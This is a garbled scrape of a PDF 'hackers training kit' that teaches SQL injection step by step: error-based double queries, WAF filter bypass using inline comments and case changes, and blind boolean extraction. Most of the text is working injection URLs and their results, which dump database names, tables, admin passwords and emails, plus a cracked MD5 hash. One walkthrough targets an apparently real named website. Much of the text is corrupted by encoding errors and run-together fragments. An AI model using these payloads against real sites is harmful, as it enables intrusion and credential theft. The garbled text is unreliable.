Ultra hackers training kit for ethical hackers and cyber security professionals

ϮͮW Ă Ő Ğ SQL Command http:// Victim.com/index.php?id=7+andselect 1 FROMselect count*,concatselect select concatdatabase FROM information_schema.tablesLIMIT 0,1,floorrand0*2x FROM inform

Trang 4

Trang 8

/ŶƚĞƌŶĂƚŝŽŶĂůŽŶĨĞƌĞŶĐĞƐĂŶĚŶĂƚŝŽŶĂůĐŽŶĨĞƌĞŶĐĞƐĂŶĚŵŽƌĞŚŝƐƌĞƐĞĂƌĐŚǁĂƐĂďŽƵƚƐĞĐƵƌŝŶŐ/d͞dŚĞďĞƐƚǁĂǇƚŽŚĂĐŬŝƐƚŚĞďĞƐƚǁĂǇƚŽƐĞĐƵƌĞ͟ĂďŽƵƚŶƚŽďǇǀŝƐŝƚŝŶŐŚŝƐƚĞĐŚŶŝĐĂůďůŽŐĂƚŚƚƚƉ͗ͬͬĂŶƚŽϮϬϭϬ͘ǁĞĞďůǇ͘ĐŽŵ

Trang 11

ϮͮW Ă Ő Ğ

SQL Command

http:// Victim.com/index.php?id=7+and(select 1

FROM(select count(*),concat((select (select

concat(database())) FROM information_schema.tablesLIMIT 0,1),floor(rand(0)*2))x FROM

information_schema.tables GROUP BY x)a)

Now you will get result like this

As you can see the site is vulnerable and returned an errorwith the current database listed in the error, in this case

"Vicitim_Database" In here We have used both floor() andrand() to query information_schema.tables which are beingnulled out in this request as floor(rand(0)*2) is null, whichallows the rest of our request to be processed and return thecurrent database name The basic syntax will repeat itself

so you will pick it up over time if it does not catch on rightaway Moving on now that we know it is vulnerable we cantest for additional databases, as well as version info and

Trang 12

Trang 13

ϰͮW Ă Ő Ğ

Now that we have the count we can alter the above to useCONCAT and LIMIT to grab the name of each databaseavailable

NOTE: You will need to keep incrementing the value of

"N" in the middle of the above query to work your waythrough the available DB names, just keep going until youhave reached the number returned in our request above thisone (i.e LIMIT 0,1 followed by LIMIT 1,1 followed byLIMIT 2,1 and just repeat as needed) We have to do thisVLQFHZHFDQ¶WXVH*5283B&21&$7

Trang 14

ϱͮW Ă Ő Ğ

Message will appear the same, but LIMIT will be changed

to get different DB Name each time

Step4

Once you have all the DB names you might want to findout the current user and confirm version info as well assome other basic stuff It can be done using slightvariations to our original query for current database whichwould look like this, notice only the call in the middle isbeing altered

SQL Command

Finding the version of the database

Trang 15

ϲͮW Ă Ő Ğ

http://Victim.com/index.php?id=7+and(select 1

concat(version())) FROM information_schema.tables

LIMIT 0,1),floor(rand(0)*2))x FROM

Trang 16

concat(@@datadir)) FROM information_schema.tablesLIMIT 0,1),floor(rand(0)*2))x FROM

Trang 17

concat(@@hostname)) FROM information_schema.tablesLIMIT 0,1),floor(rand(0)*2))x FROM

NOTE: DATADIR & HOSTNAME might not always

work, depending on version and DB setup

Trang 18

ϵͮW Ă Ő Ğ

Step7

Find the no of tables

Alright, we have gathered the basic info so now it is time tomove on to actually grabbing the table and column names

As with other methods we will start with tables and thenwork to columns, and like the above examples we will beusing CONCAT and LIMIT to allow us to get the entirecontents since we cannot use GROUP_CONCAT() Wefirst get the count and then enumerate the tables

Trang 20

ϭϭͮW Ă Ő Ğ

You will need to HEX the DB Name from which you arepulling table names from or it will not be properlyprocessed, same is true if you are pulling columns fromtables as we will do in this next step now that we havefound some tables

Trang 21

ϭϮͮW Ă Ő Ğ

FROM information_schema.tables LIMIT

0,1),floor(rand(0)*2))x FROM information_schema.tablesGROUP BY x)a)

Once the number of columns is known we can just useLIMIT again to sort through them one by one, just keepincrementing LIMIT until you have found as many as itreturned in the above request

Trang 22

ϭϯͮW Ă Ő Ğ

table_schema=<HEX_VLAUE_OF_DB_NAME> ANDtable_name=<HEX_VLAUE_OF_TABLE_NAME>

LIMIT 0,1)) FROM information_schema.tables LIMIT0,1),floor(rand(0)*2))x FROM information_schema.tablesGROUP BY x)a)

OK, so now we have outlined the entire database structureand know the tables and columns Now it is finally time toextract the desired data from the database

Trang 23

ϭϰͮW Ă Ő Ğ

<TABLE_NAME>+LIMIT+0,1),floor(rand(0)*2))x

FROM information_schema.tables+GROUP BY x)b)

If you need to continue you can do what we have done forevery other request and start incrementing the LIMIT value

to enumerate all of the data you want to pull You havesuccessfully extracted data using Double Query SQLInjection

Trang 25

ϭϲͮW Ă Ő Ğ

You have an error in your SQL syntax; check the manualthat corresponds to your MySQL server version for the right syntax to use near ''' at line 1

Step3

Check the version of MySQL

http://www.techvision.co.uk/news.php?id=45+and+(select+1+from(select%0Acount(*),concat((select+concat(version())+from+information_schema.tables+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)

Now you can get version of the database:

Duplicate entry '5.0.95-log1' for key 1

Trang 26

ϭϳͮW Ă Ő Ğ

Step4

Check the name of the database

http://www.techvision.co.uk/news.php?id=45 and (select 1 from (select count(*),concat((select(select

concat(cast(database() as char),0x7e)) from

information_schema.tables where table_schema=database()limit 0,1),floor(rand(0)*2))x from

information_schema.tables group by x)a)

Duplicate entry 'techvision281009~1' for key 1

Trang 27

ϭϴͮW Ă Ő Ğ

Step5

Find the name of the table

concat(cast(table_name as char),0x7e)) from

information_schema.tables where table_schema=database()limit 2,1),floor(rand(0)*2))x from

information_schema.tables group by x)a)

Duplicate entry 'users~1' for key 1

Next step you must convert name of the table to hex value

In now a day there are more tools are available in online to conversion

Trang 28

ϭϵͮW Ă Ő Ğ

Step6

Find the name of the column present in the table

concat(cast(column_name as char),0x7e)) from

Trang 29

ϮϬͮW Ă Ő Ğ

Step7

Find the name of the column present in the table

In here i am changing the limit to fine the another columncolumns where table_name=0x7573657273 limit 2,1)

concat(cast(column_name as char),0x7e)) from

Trang 30

Decrypt the value to get the password

9679ee7b0e7ddb35b34046a7c76e6e23 = l674300b

Note: only for learning purposes, do not use it for illegal

operation

Trang 31

ϮϮͮW Ă Ő Ğ

What is SQL injection bypassing WAF?

WAF stands for Web Application Firewall It is another

type of SQL injection In now a day SQL commands are

used for SQL injection,they allow us to bypass a lot of the

restrictions of Web application firewalls and to kill certain

64/VWDWHPHQWVWRH[HFXWHWKHDWWDFNHU¶VFRPPDQGVZKLOH

commenting out the actual legitimate query

Some other comments in SQL

Trang 32

ϮϯͮW Ă Ő Ğ

http://www.victim.com/index.php?id=777+ORDER+BY+1,2,3,4,5

No Errors

http://www.victim.com/index.php?id=777+ORDER+BY+1,2,3,4,5,6

Errors

http://www.victim.com/index.php?id=777+UNION+SELECT+1,2,3,4,5

403 Forbidden

Trang 33

http://www.victim.com/index.php?id=-777+/*!UNION*/+/*!SELECT*/+1,CONCAT(database(),user(),version()),3,4,5

403 Forbidden

Trang 34

ϮϱͮW Ă Ő Ğ

Ok, so now we have commented out our UNION SELECTstatement but something is still setting off the filters It ismost likely the CONCAT statement In some cases it ispossible to bypass filters by simply changing the norm upand retesting

http://www.victim.com/index.php?id=-777+/*!UNION*/+/*!SELECT*/+1,ConCAt(database(),user(),version()),3,4,5

Trang 35

ϮϲͮW Ă Ő Ğ

http://www.victim.com/index.php?id=-777+/*!UNION*/+/*!SELECT*/+1,GROUP_CONCAT(SCHEMA_NAME),3,4,5+FROM+INFORMATION_SCHEMA.SCHEMATA

403 Forbidden

Now you know what to do now so start by altering

GROUP_CONCAT, same as we did for CONCAT

http://www.victim.com/index.php?id=-777+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(SCHEMA_NAME),3,4,5+FROM+INFORMATION_SCHEM.SCHEMATA

No Errors

Now you can get result like this

Information_Schema

sampleDB

This should now show us the available databases; now let

us check for the tables on the current database

Trang 36

ϮϳͮW Ă Ő Ğ

http://www.victim.com/index.php?id=-777+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(TABLE_NAME),3,4,5+FROM+INFORMATION_SCHEM.TABLES+WHERE+TABLE_SCHEMA=DATABASE()

403 Forbidden again

In some cases you may have experienced a 403 in theprevious step as well, it is due to the fact that often timesINFORMATION_SCHEMA or TABLES will be filtered.Again, this changes from site to site based on how it wasconfigured so it could even be other items but these are themost common In order to get around the filters we simplyneed to use our comments method again

http://www.victim.com/index.php?id=-777+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(TABLE_NAME),3,4,5+FROM+/*!INFORMATION_SCHEM

*/.TABLES

No Errors

Now you can get result like this

Admin, Groups, Getalk, Users

Trang 37

ϮϴͮW Ă Ő Ğ

Now we have all of the tables for the current databasedisplayed on the page without any 403 holding us back andconvert the table name as Hex value

http://www.victim.com/index.php?id=-777+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(COLUMN_NAME),3,4,5+FROM+/*!INFORMATION_SCHEM*/.COLUMNS+WHERE+TABLE_NAME=0x41646d696e

OK, now it we know the tables and associated columns It

is time to get some data extracted

http://www.victim.com/index.php?id=-777+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(id,0x3a, pwd,0x3a,mailid,0x3a),3,4,5+FROM+Admin²

Trang 38

ϮϵͮW Ă Ő Ğ

Now you will get id mailid pwd etc

Some useful dorks

/**/union/*&id=*/select/*&id=*/column/*&id=*/from/*&id=*/table²

union select column from table

Trang 39

ϯϬͮW Ă Ő Ğ

It is another type of SQL injection In this chapter I showhow attackers take advantage of SQL Injectionvulnerabilities by using time-based blind SQL injectionwith heavy queries

http://www.victim.com/index.php?id=777 AND 1=1

No Errors

http://www.victim.com/index.php?id=777 AND 1=2

Errors on Page

Trang 40

So this is a good time to start enumerating some table

names from the current database

In here you will use TRUE/FALSE request statements andthen analyze the errors or response generated to determine

if we are on the right track, as we will need to start byguessing the table names This may take some guessing andsometime whichLVZK\PRVWSHRSOHGRQ¶WOLNHWKLVPHWKRGbut it can pay off when nothing else will work so just havesome patience It will work like this:

http://www.victim.com/index.php?id=777¶ DQG 6(/(&7

1 from passwords limit

Trang 42

ϯϯͮW Ă Ő Ğ

Now you will be using the TRUE/FALSE results todetermine what columns are present in the table It willwork like this:

http://www.victim.com/index.php?id=777¶DQG6(/(&7substring(concat(1,<insert-column-guess-here>),1,1) from

<table-name> limit 0,1)=1 +-¶

You are now using SUBSTRING to query within query andcheck for columns FROM our found table (admin)

http://www.victim.com/index.php?id=777¶ DQG 6(/(&7substring(concat(1,userid),1,1) from admin limit 0,1)=1 +-

No Errors

http://www.victim.com/index.php?id=777¶ DQG 6(/(&7substring(concat(1,login),1,1) from admin limit 0,1)=1 +-Errors

http://www.victim.com/index.php?id=777¶ DQG 6(/(&7substring(concat(1,username),1,1) from admin limit0,1)=1 +-

No Errors

Trang 43

ϯϰͮW Ă Ő Ğ

http://www.victim.com/index.php?id=777¶ DQG 6(/(&7substring(concat(1,password),1,1) from admin limit 0,1)=1-

No Errors

Now you will change limit to get different

Now that you have found the table name and associatedcolumn names we can actually extract some data In order

to extract you will change up our syntax slightly so that ittakes advantage of the ASCII CHAR conversion We willagain analyze the results of based on TRUE/FALSEresponses.This part is very time consuming as we have toget each letter at a time (in CHAR value) and then convert

it over to get the standard plain text that most people canidentify with

http://www.victim.com/index.php?id=777¶DQG

ascii(substring((SELECT concat(username,0x3a,password)from users where userid=1),1,1))>65

TRUE± the first char of password for admin with userid1

is great than 65 so we need to go higher with our next

request until we hit error

Trang 44

ϯϱͮW Ă Ő Ğ

FALSE± Error, indicating it is not a char greater than 122which is good as that is what we would expect, so now weneed to meet in the middle

TRUE± still need to continue moving higher

FALSE± getting warmer, but still need to reduce a littlehttp://www.victim.com/index.php?id=777¶DQG

TRUE± still need to continue moving higher

Trang 45

ϯϲͮW Ă Ő Ğ

FALSE± indicating we have gone too far ± WTF?

TRUE± Indicating we need to move up

As you can see this can take some time In the exampleabove we would use some reasoning and determine that thechar value is greater than 111, but less than 113 When weran the test against 112 it indicated as true thus meaning it

is greater than OR equal to 112 If we convert this we getWKH OHWWHU ³S´ 2. VR ZH KDYH WKH ILUVW OHWWHU QRZ OHW¶Vadjust our LIMIT at the end to move on to the secondcharacter position We will also do our best to use ourbrains to speed things up and start guessing the next logicalFKDUDFWHUWRIROORZD³S´OLNHPD\EHDQ³D´ ,WQRZlooks like this:

Trang 46

ϯϳͮW Ă Ő Ğ

FALSE± indicating we have gone too far and that we wereright withWKHJXHVVRIDQ³D´ZKLFKLVWKHFKDUYDOXHIRU

OK so we have no found the first two letters of the

SDVVZRUGZKLFKDUH³SD´OHW¶VNHHSJXHVVLQJ

FALSE± indicating we have gone too far and that we wereULJKWRQWUDFNZLWKWKHJXHVVLQJRIDQ³V´ZKLFKLVWKHFKDUvalue for 115

http://Victim.com/index.php?id=7 +and( select

concat(version())) FROM information_schema.tables

LIMIT 0,1),floor(rand(0)*2))x FROM

information_schema.tables... actually grabbing the table and column names

As with other methods we will start with tables and thenwork to columns, and like the above examples we will beusing CONCAT and LIMIT to allow us...

table_schema=<HEX_VLAUE_OF_DB_NAME> ANDtable_name=<HEX_VLAUE_OF_TABLE_NAME>

LIMIT 0,1)) FROM information_schema.tables LIMIT0,1),floor(rand(0)*2))x FROM information_schema.tablesGROUP BY

Định dạng
Số trang	53
Dung lượng	3,15 MB